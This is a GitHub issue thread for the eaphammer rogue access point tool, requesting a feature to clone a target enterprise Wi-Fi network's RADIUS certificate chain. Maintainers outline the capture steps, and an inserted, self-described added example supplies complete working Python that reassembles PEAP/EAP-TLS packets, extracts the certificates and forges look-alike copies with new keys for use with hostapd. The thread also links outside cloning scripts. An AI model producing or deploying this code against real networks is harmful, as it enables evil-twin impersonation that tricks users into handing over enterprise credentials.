Feature Request: Clone cert details from target networks

Open thesle3p opened this issue 7 years ago • 9 comments

Would it be possible to add functionality to eaphammer to enumerate Certificate information from the network we wish to impersonate and automatically feed that into the cert-wizard? It would speed up the process of deploying eaphammer.

thesle3p avatar Feb 04 '18 21:02 thesle3p

Awesome idea. We'll definitely get this added within the next couple of releases.

s0lst1c3 avatar Feb 16 '18 04:02 s0lst1c3

@s0lst1c3 how do you envision this working? I've got a few ideas, but want to see what you had in mind.

kmackinley avatar Mar 12 '18 20:03 kmackinley

You give it the ESSID of an in-proximity network and it would request and parse its SSL cert info from that network and automatically pass it to the cert wizard.

thesle3p avatar Mar 12 '18 20:03 thesle3p

That's what I thought, just wanted to clarify, thanks for the info.

kmackinley avatar Mar 12 '18 20:03 kmackinley

At a high level, you'd want to use the following steps:

  1. Accept target ESSID and interface from user
  2. Begin sniffing for SSL/TLS Server Hello packets on provided interface (using Scapy or similar)
  3. Initiate an authentication attempt against target ESSID using call to wpa_supplicant or similar
  4. When SSL/TLS Server Hello packet is detected, bail out of the authentication attempt
  5. Extract the SSL certificate from the Server Hello packet and parse it for metadata
  6. Generate new snakeoil certificates

If you check out packet 125 in this pcap file you'll see what I mean:

https://mrncciew.files.wordpress.com/2014/08/eap-peap-7921.zip

Feel free to take a whack at this yourselves if you're up for it. I'm currently in the process of adding 802.11n/802.11ac support, which is forcing me to do some minor refactoring due to design decisions I made a year ago. No big deal, but it means I probably won't have time to start on this for a couple of weeks.

s0lst1c3 avatar Mar 13 '18 05:03 s0lst1c3
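
The steps listed in the comment above, worked through as an added example that is not eaphammer's code and not something the project ships: it covers steps 2, 4, 5 and 6 on already-captured EAP packets (step 1 and the live `wpa_supplicant` attempt in step 3 need a radio, and the EAP layers would come out of EAPOL frames via Scapy as suggested). It reassembles PEAP/EAP-TLS fragments, pulls the DER chain out of the TLS Certificate message, and re-issues every certificate with a fresh key while copying subject, issuer, serial, validity and the user-visible extensions. It needs the `cryptography` package; the "Example Corp" CA and `radius.example.com` server certificate, and the EAP packets built from them, are constructed inside the block rather than taken from any real capture.

```python
# Added example, not eaphammer's own code. Needs the `cryptography` package.
import datetime, struct
from cryptography import x509
from cryptography.hazmat.primitives import hashes, serialization
from cryptography.hazmat.primitives.asymmetric import rsa
from cryptography.x509.oid import NameOID

EAP_REQUEST, EAP_RESPONSE, EAP_TYPE_TLS, EAP_TYPE_PEAP = 1, 2, 13, 25
FLAG_L, FLAG_M, FLAG_S = 0x80, 0x40, 0x20   # length-included, more-fragments, start
TLS_HANDSHAKE, HS_CERTIFICATE = 22, 11
COPIED_EXTENSIONS = (x509.SubjectAlternativeName, x509.BasicConstraints,
                     x509.KeyUsage, x509.ExtendedKeyUsage)

def reassemble_eap_tls(eap_packets):
    """Glue the TLS data out of the AP's EAP-Request fragments (RFC 5216 3.1);
    the Start packet and the client's ACK responses carry none."""
    buf = b""
    for pkt in eap_packets:
        code, _ident, length = struct.unpack("!BBH", pkt[:4])
        if code != EAP_REQUEST or length != len(pkt) or length < 6:
            continue
        eap_type, flags = pkt[4], pkt[5]
        if eap_type not in (EAP_TYPE_TLS, EAP_TYPE_PEAP) or flags & FLAG_S:
            continue
        off = 10 if flags & FLAG_L else 6     # L: 4-byte TLS Message Length present
        buf += pkt[off:length]
        if not flags & FLAG_M:
            break                             # last fragment of this flight
    return buf

def extract_certificate_chain(tls_stream):
    """Return the DER certs (leaf first) from the first TLS Certificate
    handshake message, re-joining handshake data split across records."""
    hs, off = b"", 0
    while off + 5 <= len(tls_stream):
        ctype, _ver, rlen = struct.unpack("!BHH", tls_stream[off:off + 5])
        if ctype == TLS_HANDSHAKE:
            hs += tls_stream[off + 5:off + 5 + rlen]
        off += 5 + rlen
    off = 0
    while off + 4 <= len(hs):
        htype, hlen = hs[off], int.from_bytes(hs[off + 1:off + 4], "big")
        body, off = hs[off + 4:off + 4 + hlen], off + 4 + hlen
        if htype == HS_CERTIFICATE:
            chain, p = [], 3                  # skip 3-byte certificate_list length
            while p + 3 <= len(body):
                clen = int.from_bytes(body[p:p + 3], "big")
                chain.append(body[p + 3:p + 3 + clen])
                p += 3 + clen
            return chain
    return []

def clone_chain(der_chain):
    """Re-issue the captured chain with fresh keys: names, serial, validity and
    user-visible extensions are copied; the top-most cert is self-signed."""
    originals = [x509.load_der_x509_certificate(d) for d in der_chain]
    cloned, signer_key = [], None
    for cert in reversed(originals):          # parents before children
        key = rsa.generate_private_key(65537, 2048)
        b = (x509.CertificateBuilder().subject_name(cert.subject)
             .issuer_name(cert.issuer).public_key(key.public_key())
             .serial_number(cert.serial_number)  # *_utc attrs exist from cryptography 42 on
             .not_valid_before(getattr(cert, "not_valid_before_utc", None) or cert.not_valid_before)
             .not_valid_after(getattr(cert, "not_valid_after_utc", None) or cert.not_valid_after))
        for ext in cert.extensions:
            if isinstance(ext.value, COPIED_EXTENSIONS):
                b = b.add_extension(ext.value, ext.critical)
        cloned.append((b.sign(signer_key or key, hashes.SHA256()), key))
        signer_key = key
    return cloned[::-1]                       # leaf first again

def build_sample_capture():
    """Constructed input, not a real capture: a fake CA and RADIUS server cert in one
    TLS record, split into two PEAP EAP-Requests after a PEAP-Start, plus a client ACK."""
    now = datetime.datetime.now(datetime.timezone.utc).replace(microsecond=0)
    name = lambda cn: x509.Name([x509.NameAttribute(NameOID.COMMON_NAME, cn)])
    def issue(subject, issuer, key, signer, days, ext):
        return (x509.CertificateBuilder().subject_name(subject).issuer_name(issuer)
                .public_key(key.public_key()).serial_number(x509.random_serial_number())
                .not_valid_before(now).not_valid_after(now + datetime.timedelta(days=days))
                .add_extension(ext, critical=False).sign(signer, hashes.SHA256()))
    ca_key, srv_key = rsa.generate_private_key(65537, 2048), rsa.generate_private_key(65537, 2048)
    ca = issue(name("Example Corp Root CA"), name("Example Corp Root CA"), ca_key, ca_key,
               3650, x509.BasicConstraints(ca=True, path_length=None))
    srv = issue(name("radius.example.com"), ca.subject, srv_key, ca_key, 365,
                x509.SubjectAlternativeName([x509.DNSName("radius.example.com")]))
    chain = [c.public_bytes(serialization.Encoding.DER) for c in (srv, ca)]
    certs = b"".join(len(c).to_bytes(3, "big") + c for c in chain)
    hs = bytes([HS_CERTIFICATE]) + (len(certs) + 3).to_bytes(3, "big") + len(certs).to_bytes(3, "big") + certs
    record = struct.pack("!BHH", TLS_HANDSHAKE, 0x0303, len(hs)) + hs
    def eap(code, ident, flags, data=b""):
        body = bytes([EAP_TYPE_PEAP, flags]) + data
        return struct.pack("!BBH", code, ident, 4 + len(body)) + body
    mid = len(record) // 2
    return chain, [eap(EAP_REQUEST, 1, FLAG_S | 1),                    # PEAP-Start, v1
                   eap(EAP_REQUEST, 2, FLAG_L | FLAG_M | 1, struct.pack("!I", len(record)) + record[:mid]),
                   eap(EAP_RESPONSE, 2, 1),                             # client ACK
                   eap(EAP_REQUEST, 3, 1, record[mid:])]
```

Run it as `chain, capture = build_sample_capture()` and then `clone_chain(extract_certificate_chain(reassemble_eap_tls(capture)))`; each returned pair is a cloned certificate and its new private key, ready to be written out as PEM for hostapd. The caveat the thread's step 4 hints at applies here too: bail out of the capture once the Certificate message is complete, since the real RADIUS server will keep sending the rest of its flight and a supplicant that pins the CA will still reject the clone, which only fools clients that skip server validation or merely eyeball the names.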

You may want to borrow code from eapeak instead https://github.com/securestate/eapeak/blob/master/eapeak

thesle3p avatar Apr 13 '18 18:04 thesle3p

Would be awesome if we could integrate eaphammer with https://github.com/sensepost/apostille or implement similar functionality as a module.

s0lst1c3 avatar Apr 15 '19 23:04 s0lst1c3

Hi all. I had written a python script, with similar functionality to apostille, that could be adapted for this feature: https://gist.github.com/tyrells/4667515e4d54ab1c01a48aa323a30ce5.

This script will take an input directory/file, parse all exported certificates and attempt to clone a selected certificate chain.

tyrells avatar Sep 21 '20 17:09 tyrells

That is badass. I will attempt to incorporate this in the near future and make sure to credit you.

s0lst1c3 avatar Sep 22 '20 02:09 s0lst1c3